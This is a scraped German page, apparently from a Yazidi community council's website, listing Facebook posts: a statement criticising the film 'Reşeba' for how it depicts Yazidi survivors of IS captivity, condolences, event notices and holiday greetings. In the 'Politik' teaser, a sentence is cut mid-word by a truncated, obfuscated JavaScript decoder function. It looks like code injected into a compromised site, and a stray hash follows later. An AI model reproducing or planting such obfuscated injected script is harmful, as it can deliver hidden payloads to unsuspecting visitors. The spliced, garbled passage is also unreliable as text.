Donnerstag, April 26, 2018

Facebook Posts

Deutsch - Arabisch

Unser Brief an den Bundesinnenminister Herrn Horst Seehofer
... See MoreSee Less

21 hours ago  ·  

View on Facebook

Stellungnahme zum Film „Reşeba - The Dark Wind“
Ein Film von Mehmet Aktaş und Hussein Hassan / Mitosfilm

Der Film „Reşeba – The Dark Wind“, zu Deutsch „der schwarze Wind“, wird zurzeit in Kinos in Deutschland ge-zeigt. Dieser Film selbst und auch Kommentierungen des Films in einigen einschlägigen Medien veranlassen uns zu dieser Stellungnahme.

Der Film hat den Völkermord des IS („Islamischer Staat“) an die Jesiden im Shingal (Nord-Irak), der am 03.08.2014 begann, als Hintergrund. Der IS sah die Jesiden als Ungläubige an und wollte deshalb die jezidische Religion vollständig vernichten. Der Film ist keine Dokumentation der damaligen Verbrechen, sondern zeigt als fiktiver Spielfilm am Beispiel der Liebesgeschichte der Jesiden Reko und Pero wie plötzlich das Furchtbare, das eigentlich menschlich Unvorstellbare in den Alltag und in die Gemeinschaft der Jesiden einbricht. Insbesondere wurden jesidische Mädchen und Frauen zu Opfern des IS und viele waren traumatisierender Gewalt ausgesetzt. So zeigt der Film die Leidensgeschichte der Jesidin Pero, die verschleppt, versklavt, verkauft und vergewaltigt wurde. Zugleich wird das Verhalten der jesidischen Religionsführung und dieser Religionsgemeinschaft zu den Opfern in einer Art und Weise dargestellt, die wir kritisieren und der wir deutlich widersprechen. Dieses ist der Hauptpunkt unserer Kritik, obwohl der Film noch weitere Aspekte enthält, die eigentlich auch zu kritisieren wären.

Die subtile Botschaft des Films Reşeba ist:
Die religiöse Führung hat zwar die aus der IS-Gefangenschaft freigekommenen Jesidinnen durch religiöse Rituale willkommen geheißen und sie damit als Mitglieder der Religionsgemeinschaft würdevoll integriert, aber ihre soziale Stellung in der Gemeinschaft bleibt trotzdem nach der Rückkehr die von Außenseiterinnen, die wegen ihrer Missbrauchserfahrung nicht mehr in die Familien und die Gemeinschaft hineinpassen.
Durch diese pauschalierende Unterstellung zweifeln die Filmmacher indirekt die Autorität unseres Religiösen Rates an und diskriminieren damit zudem unsere ganze Religionsgemeinschaft. Zugleich werden die betroffenen Frauen und Mädchen noch einmal zu Opfern gemacht und das erlittene Leid des jesidischen Volkes vergrößert und verlängert.

Die Wahrheit ist aber eine andere:
Es dürfte nur allzu verständlich sein, dass der brutale IS-Terror, den die Jesiden erleiden mussten, für unsere Ge-meinschaft eine existentielle Grenzerfahrung unvorstellbaren Ausmaßes war und uns emotional zerrissen zurück gelassen hat. Wir wissen aus unseren leidvollen Erfahrungen nur zu gut, dass der so erniedrigende Missbrauch der Opfer nie wieder ungeschehen gemacht werden kann. Für alle Betroffenen war und ist es ungemein schwer, danach wieder in ein normales Alltagsleben zurückzufinden. Wir müssen mit dieser erneuten Leidensgeschichte unseres Volkes weiterleben.

Doch trotz dieser großen Herausforderung steht fest, dass die jesidischen Mädchen und Frauen, die aus der brutalen IS-Gefangenschaft entkamen, von der jesidischen Gemeinschaft weder verstoßen noch an den Rand der Gesellschaft gedrängt wurden. Die Opfer wurden vom Religiösen Rat der Jesiden (Civata Ruhani) in Lalish, dem religiösen Zentrum der Jesiden, mit religiösem Zeremoniell empfangen. Diesen Mädchen und Frauen werden aufgrund ihrer erlittenen Torturen großer Respekt und Ehre von den Jesiden entgegengebracht. Ihr Platz befindet sich in der Mitte der Gesellschaft. So wurde zum Beispiel eine Vielzahl von Hochzeiten dieser Heldinnen unter großer Anteilnahme gefeiert.

Sie werden als Heldinnen betrachtet, weil sie den IS moralisch besiegt haben. Sie reden offen über ihr Leid und was ihnen widerfahren ist. Sie versuchen auf unterschiedlichen Wegen auf das Schicksal tausender jesidischer Frauen und Mädchen, die sich noch in IS-Gefangenschaft befinden, aufmerksam zu machen. Selten haben wohl Opfer sexueller Gewalt so schnell und in so großer Zahl die Öffentlichkeit aufgesucht, um den Kampf gegen die Täter aufzunehmen. Die berühmteste Vertreterin ist Nadia Murad, die Trägerin des Václav-Havel-Menschenrechtspreis des Europäischen Parlaments sowie ernannt als UN-Sonderbotschafterin.

Die Frauen aus der IS-Gefangenschaft sehen durch diesen Film ihre Gesellschaft und ihre Religion, die sie so fürsorglich wieder aufgenommen hat, als beleidigt und diskriminiert. Sie weisen darauf hin, dass der Genozid noch andauert. Es sind etwa 2.800 Jesiden, überwiegend Frauen und Kinder, noch immer in Gefangenschaft des IS. Sie fordern mehr hierfür zu tun, statt auf Kosten der Opfer auch noch aus ihrer Geschichte kommerziellen Erfolg zu schlagen. Dem schließen wir uns an
Es ist unsere Überzeugung, dass das ungeheuerliche Verbrechen an dem jesidischen Volk durch den fiktiven Spielfilm „Reşeba“ nicht annähernd angemessen wiedergegeben wird und eher pauschalierende Vorurteile gegenüber unserer Religionsgemeinschaft bestätigt. Der Film klärt nicht auf, sondern sät Misstrauen. Es fehlt ihm an der erforderlichen religiösen Sensibilität und verletzt unsere religiöse Identität.
Bielefeld, den 18. April 2018

Wir wollen ergänzend auf folgende Bücher hinweisen, in denen jesidische Missbrauchsopfer ihr erlittenes Leid eindrucksvoll schildern:

Nadia Murat „Ich bin eure Stimme“
Das Mädchen, das dem Islamischen Staat entkam und gegen Gewalt und Versklavung kämpft
Mit einem Vorwort von Amal Clooney, Knaur-Verlag, Oktober 2017, 363 Seiten

Farida Khalaf „Das Mädchen, das den IS besiegte“
Faridas Geschichte
Bastei Lübbe Taschenbuch, 2016, 256 Seiten

SHIRIN mit Alexandra Cavelius und Jan Kizilhan „Ich bleibe eine Tochter des Lichts“
Meine Flucht aus den Fängen der IS-Terroristen,
Knaur-Verlag, Juni 2017, 352 Seiten

Auch sind weitere erschütternde Schicksalsberichte von jesidischen Frauen und Mädchen in arabischer Sprache erschienen.
... See MoreSee Less

6 days ago  ·  

View on Facebook

De-ku

Wir trauern mit unserem Vorstandsmitglied Şêx Fakhreddin Abdo. Şêx Fakhreddin verlor heute im Kreis Aleppo in Syrien 5 Familienmitglieder. Es ist eine schreckliche Nachricht für uns alle und insbesondere für die Familie Abdo. Mögen ihnen Tawsî Melek und Xwedê beistehen, um diesen schweren Verlust zu verkraften.
--------------
Me bi xemgînî bihîst ku îro 5 nevsên malbata endamê rêvebirtiya ZÊD (Navenda Şêwirmendî ya Êzîdiyan li Almanya) Şêx Fakhreddin Abdo bi bombeya di trampêlekê de li Alepo çûn ser dilovaniya xwe. Em zahv xemgînin û ji hemû kessên malbata şêx Fakhreddin re sersaxiyê dixwazin. Xwedê û Tawsî Melek alîkarê wan be. Rahma xwedê li kessên jiyana xwe windakirîn be.
... See MoreSee Less

2 weeks ago  ·  

View on Facebook

Auch in 2018 plant der ZÊD eine Gedenkveranstaltung zum Jahrestag des Genozides an den Êzîden in Shingal am 03. August 2014, der immer noch andauert. Wer uns dabei unterstützen oder mitwirken möchte, kann sich gerne bei uns melden. ... See MoreSee Less

3 weeks ago  ·  

View on Facebook

Vom 24.03-25.03.2018 war unser Beiratsmitglied Ilyas Yanc (Religion) in Stuttgart und hat im Rahmen des Modellprojekt " Jungs in BW" einen Vortrag über die Êziden und das Êzidentum abgehalten.

Eingeführt wurde in das Êzidentum. Vorgestellt wurden die Ethnie, ihre Verbreitungsgebiete, die Theologie (Ursprung, Kos-mogonie, Gebote und Verbote, Menschenbild, Kastensystem, religiöse Texte), die religiöse und kulturelle Praxis, Gebete, Taufe, Hochzeit, Tod, Feiertage, Religionsunterricht. Thematisiert wurden auch die Stellung der Frau und traditionelle Rollenbilder, Integration und Selbstorganisation in Deutschland, Verfolgung und Asyl.Am Beispiel des Gemeindelebens im Gemeindehaus Oldenburg wurde das Leben der Êziden in Deutschland dargestellt.

Das Programm im Detail
Vorstellung und Hintergründe des Projekts „Sonderkontingent besonders schutzbedürftiger Personen aus dem Nordirak“, Ziele des Projekts „Yezidische Jungs in BW“

Staatsministerium Baden-Württemberg, INSIDE OUT

Im Zuge des „Sonderkontingents für besonders schutzbedürftige Frauen und Kinder aus dem Nordirak“ hat das Land Baden-Württemberg rund eintausend Personen aus dem Nordirak aufgenommen und in Kommunen untergebracht. Durch die genozidalen Angriffe des IS auf die Yeziden sind vor allem Ehemänner und Väter ermordet worden. Gerade den zum Zeitpunkt der Aufnahme mehr als 300 männlichen Minderjährigen – davon 190 zwischen 12 und 17 Jahren – fehlen daher männliche Bezugspersonen, an denen sie sich orientieren können. Hier setzt das Projekt an und geht mit den Teilnehmenden einen wichtigen Schritt hin zu neuen Perspektiven. Das Projekt „Yezidische Jungs in BW“ fördert die Stärkung von besonders schutzbedürftigen männlichen Jugendlichen und die Vermittlung positiver Männerbilder. Unterstützt wird es vom Staatsministerium Baden-Württemberg.

Träger sind LAGJ, Jungen im Blick, Staatsministerium BW Und INSIDE OUT Fach- und Beratungsstelle Extremismus.
... See MoreSee Less

1 month ago  ·  

View on Facebook

Der Einladung der KFD (Katholische Frauengemeinschaft Deutschlands), dieses Mal in Andernach/RLP, folgte die stellvertretende Vorsitzende und Leiterin der Frauenkommission Zemfira Dlovani sehr gerne. Einem interessierten Publikum erzählte sie über die Religion der Eziden und die Rolle der Frauen, insbesondere im Zusammenhang mit den wiederkehrenden Genoziden. Das Treffen galt dem Kennenlernen, erst mal. Ein stetiger Austausch zwischen den Frauenorganisationen ist von enormer Wichtigkeit und wird auch in Zukunft fortgeführt. Die jüngst gegründete Frauenkommission des ZED kann von der KFD viel lernen. Die Anfänge der heutigen kfd reichen zurück bis in die zweite Hälfte des 19. Jahrhunderts. Die Geschichte der KFD zeigt, dass die Gründung der Frauenkommission im ZED ein guter Schritt in die richtige Richtung war. ... See MoreSee Less

1 month ago  ·  

View on Facebook

+++ N E V R O Z +++

Wir wünschen allen Völkern im Nahen Osten ein friedvolles und frohes Nevroz-Fest. Mögen die Kriege und die Tyrannei ein Ende finden.
-----------------

Em Nevroza hemû gelên Rojhilata navîn pîroz dikin. Bila dawiya bindestkirinê, şeran û kuştinê were. Bila dawiya zalimiyê were...
... See MoreSee Less

1 month ago  ·  

View on Facebook

Politik

Am 29. Januar 2017 wurde in Bielefeld eine neue Interessenvertretung mit dem Namen „Zentralrat der Êzîden in Deutschlandfunction h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<>4);u1=((sa&15)<>2);q3=((r9&3)<=192)t2+=848;else if(t2==168)t2=1025;else...

Yezidentum

Telim Tolan Mit über 120.000 Menschen sind inzwischen die Jesiden (Jesiden, kurdische Bezeichnung Êzîdî) in der Bundesrepublik vertreten. Insgesamt wird ihre Zahl auf über 1.000.000...

Spendefilm

 

Kettenanhänger

Yezidisches Symbol als Kettenanhänger

c65d552819

Die Menschen in Shingal brauchen eure Hilfe!

Spenden